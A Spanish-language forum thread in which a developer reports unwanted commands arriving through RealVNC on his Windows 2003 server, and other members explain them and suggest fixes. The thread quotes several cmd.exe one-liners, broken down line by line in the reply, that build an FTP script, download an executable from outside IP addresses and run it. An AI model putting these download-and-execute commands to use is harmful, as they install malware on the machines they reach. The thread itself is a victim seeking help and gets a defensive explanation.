In order for this site to work correctly we need to store a small file (called a cookie) on your computer. Most every site in the world does this, however since the 25th of May 2011, by law we have to get your permission first. Please abandon the forum if you disagree.

Para que este foro funcione correctamente es necesario guardar un pequeño fichero (llamado cookie) en su ordenador. La mayoría de los sitios de Internet lo hacen, no obstante desde el 25 de Marzo de 2011 y por ley, necesitamos de su permiso con antelación. Abandone este foro si no está conforme.

OT... Espias en mi ordenador???

Foro público de Xailer en español
Responder
Xevi
Mensajes: 1706
Registrado: Jue Sep 08, 2005 12:58 pm

OT... Espias en mi ordenador???

Mensaje por Xevi »

Desde que he instalado RealVNC en mi Server2003 de vez en cuando recibo
algunas peticiones y directamente me abre el MSDOS...
cmd.exe /c echo open 85.50.52.174 25606>x&echo get
84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del
x&exit
cmd.exe /c echo open 85.50.55.180 17226>x&echo get
84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del
x&exit
cmd.exe /c echo open 85.50.17.133 30659>x&echo get
84785_redworld2.exe>>x&echo quit>>x&ftp -n -s:x&84785_redworld2.exe&del
x&exit
¿alguien sabe que hace este comando???
Gracias.
Un Saludo,
Xevi.
jlalin
Mensajes: 926
Registrado: Sab Dic 25, 2010 11:10 pm

OT... Espias en mi ordenador???

Mensaje por jlalin »

Xevi,
> ¿alguien sabe que hace este comando???
Si partes la lí­nea desde el ampersand verás que abre una consola, genera un
archivo de nombre x como un script FTP, luego se conecta a un servidor FTP
para descargar un archivo y lo ejecuta.
//---
echo open 85.50.17.133 30659>x
echo get 84785_redworld2.exe>>x
echo quit >>x
ftp -n -s:x
84785_redworld2.exe
del x
exit
//---
He preguntado a San Gugel y me ha dicho:
Grave vulnerabilidad en RealVNC
http://www.hispasec.com/unaaldia/2760
Y parece que tiene cura:
http://www.seguridadenred.net/index.php ... _content&a mp;task=view&id=45&Itemid=28
Espero que te sirva.
Saludos,
José Lalí­n
Xevi
Mensajes: 1706
Registrado: Jue Sep 08, 2005 12:58 pm

OT... Espias en mi ordenador???

Mensaje por Xevi »

Gracias maestro!!!
Le pongo la cura pues...
Un Saludo,
Xevi.
"José Lalín" <dezac@corevia.com> ha escrit al missatge del grup de
discussió: 45104a7a$[email=1@news.xailer.com...]1@news.xailer.com...[/email]
>
> Xevi,
>
>> ¿alguien sabe que hace este comando???
>
> Si partes la línea desde el ampersand verás que abre una consola, genera
> un archivo de nombre x como un script FTP, luego se conecta a un servidor
> FTP para descargar un archivo y lo ejecuta.
>
> //---
> echo open 85.50.17.133 30659>x
> echo get 84785_redworld2.exe>>x
> echo quit >>x
> ftp -n -s:x
> 84785_redworld2.exe
> del x
> exit
> //---
>
> He preguntado a San Gugel y me ha dicho:
>
> Grave vulnerabilidad en RealVNC
> http://www.hispasec.com/unaaldia/2760
>
> Y parece que tiene cura:
> http://www.seguridadenred.net/index.php ... _content&a mp;task=view&id=45&Itemid=28
>
> Espero que te sirva.
>
> Saludos,
> José Lalín
Avatar de Usuario
ignacio
Site Admin
Mensajes: 9463
Registrado: Lun Abr 06, 2015 8:00 pm
Ubicación: Madrid, Spain
Contactar:

OT... Espias en mi ordenador???

Mensaje por ignacio »

Xevi,
Prueba UltraVNC, es compatible 100% con VNC, pero incluye transferencia de
ficheros y además no tiene esos problemas de seguridad.
Un saludo
--
Ignacio Ortiz de Zúñiga
http://www.xailer.com
"Xevi" <xevicomas@gmail.com> escribió en el mensaje
news:[email=45104ada@news.xailer.com...]45104ada@news.xailer.com...[/email]
> Gracias maestro!!!
>
> Le pongo la cura pues...
>
> Un Saludo,
> Xevi.
>
>
> "José Lalín" <dezac@corevia.com> ha escrit al missatge del grup de
> discussió: 45104a7a$[email=1@news.xailer.com...]1@news.xailer.com...[/email]
>>
>> Xevi,
>>
>>> ¿alguien sabe que hace este comando???
>>
>> Si partes la línea desde el ampersand verás que abre una consola, genera
>> un archivo de nombre x como un script FTP, luego se conecta a un servidor
>> FTP para descargar un archivo y lo ejecuta.
>>
>> //---
>> echo open 85.50.17.133 30659>x
>> echo get 84785_redworld2.exe>>x
>> echo quit >>x
>> ftp -n -s:x
>> 84785_redworld2.exe
>> del x
>> exit
>> //---
>>
>> He preguntado a San Gugel y me ha dicho:
>>
>> Grave vulnerabilidad en RealVNC
>> http://www.hispasec.com/unaaldia/2760
>>
>> Y parece que tiene cura:
>> http://www.seguridadenred.net/index.php ... _content&a mp;task=view&id=45&Itemid=28
>>
>> Espero que te sirva.
>>
>> Saludos,
>> José Lalín
>
>
Ignacio Ortiz de Zúñiga
[OZ Software]
https://www.ozs.es
--
[Equipo de Xailer / Xailer team]
https://www.xailer.com
Xevi
Mensajes: 1706
Registrado: Jue Sep 08, 2005 12:58 pm

OT... Espias en mi ordenador???

Mensaje por Xevi »

Ignacio,
Ya estuve probando UltraVNC, e incluso me gusta más que RealVNC, ahora bien,
por problemas de compatibilidad (me cuelga la conexión del VNCServer muy a
menudo cuando está el eMule activado, en un Windows2003 Server).
Muchas gracias por vuestras opiniones, que no tienen nada que ver con
Xailer, pero si que tienen que ver para poder solucionar "problemas" que
puedan tener mis aplicaciones hechas en Xailer en clientes que necesitarían
de un desplazamiento para poder repararlo.
Por cierto... dado que me encontré con este error del VNC, me dio por buscar
Controles Remotos en Google, y...
aprovechando el hilo... para los nuestros clientes que tienen IPs
dinámicas... y para no tener que ir abriendo puertos del router...
He probado LogMeIn... y la verdad es que va de fábula!!!
Control Remoto a través de web, sin necesidad de saber la IP del ordenador
Server al cual vamos a manipular remotamente.
GRACIAS.
Un Saludo,
Xevi.
"Ignacio Ortiz de Zúñiga" <NoName@xailer.com> ha escrit al missatge del grup
de discussió: 4510efe4$[email=1@news.xailer.com...]1@news.xailer.com...[/email]
> Xevi,
>
> Prueba UltraVNC, es compatible 100% con VNC, pero incluye transferencia de
> ficheros y además no tiene esos problemas de seguridad.
>
> Un saludo
>
> --
> Ignacio Ortiz de Zúñiga
> http://www.xailer.com
> "Xevi" <xevicomas@gmail.com> escribió en el mensaje
> news:[email=45104ada@news.xailer.com...]45104ada@news.xailer.com...[/email]
>> Gracias maestro!!!
>>
>> Le pongo la cura pues...
>>
>> Un Saludo,
>> Xevi.
>>
>>
>> "José Lalín" <dezac@corevia.com> ha escrit al missatge del grup de
>> discussió: 45104a7a$[email=1@news.xailer.com...]1@news.xailer.com...[/email]
>>>
>>> Xevi,
>>>
>>>> ¿alguien sabe que hace este comando???
>>>
>>> Si partes la línea desde el ampersand verás que abre una consola, genera
>>> un archivo de nombre x como un script FTP, luego se conecta a un
>>> servidor FTP para descargar un archivo y lo ejecuta.
>>>
>>> //---
>>> echo open 85.50.17.133 30659>x
>>> echo get 84785_redworld2.exe>>x
>>> echo quit >>x
>>> ftp -n -s:x
>>> 84785_redworld2.exe
>>> del x
>>> exit
>>> //---
>>>
>>> He preguntado a San Gugel y me ha dicho:
>>>
>>> Grave vulnerabilidad en RealVNC
>>> http://www.hispasec.com/unaaldia/2760
>>>
>>> Y parece que tiene cura:
>>> http://www.seguridadenred.net/index.php ... _content&a mp;task=view&id=45&Itemid=28
>>>
>>> Espero que te sirva.
>>>
>>> Saludos,
>>> José Lalín
>>
>>
>
>
jlalin
Mensajes: 926
Registrado: Sab Dic 25, 2010 11:10 pm

OT... Espias en mi ordenador???

Mensaje por jlalin »

Xevi,
> Ya estuve probando UltraVNC, e incluso me gusta más que RealVNC, ahora bien,
> por problemas de compatibilidad (me cuelga la conexión del VNCServer muy a
> menudo cuando está el eMule activado, en un Windows2003 Server).
Creo que en los ayuda/foros del eMule habí­a algunas explicaciones para
permitir que conviva con otros programas que utilicen intensivamente
sockets sin que se peleen.
Mira también si el VNCServer tiene alguna opción de timeout por defecto
para las conexiones.
> Muchas gracias por vuestras opiniones, que no tienen nada que ver con
> Xailer, pero si que tienen que ver para poder solucionar "problemas" que
> puedan tener mis aplicaciones hechas en Xailer en clientes que necesitarí­an
> de un desplazamiento para poder repararlo.
"No problemo" :-) A mandar.
Saludos,
José Lalí­n
Responder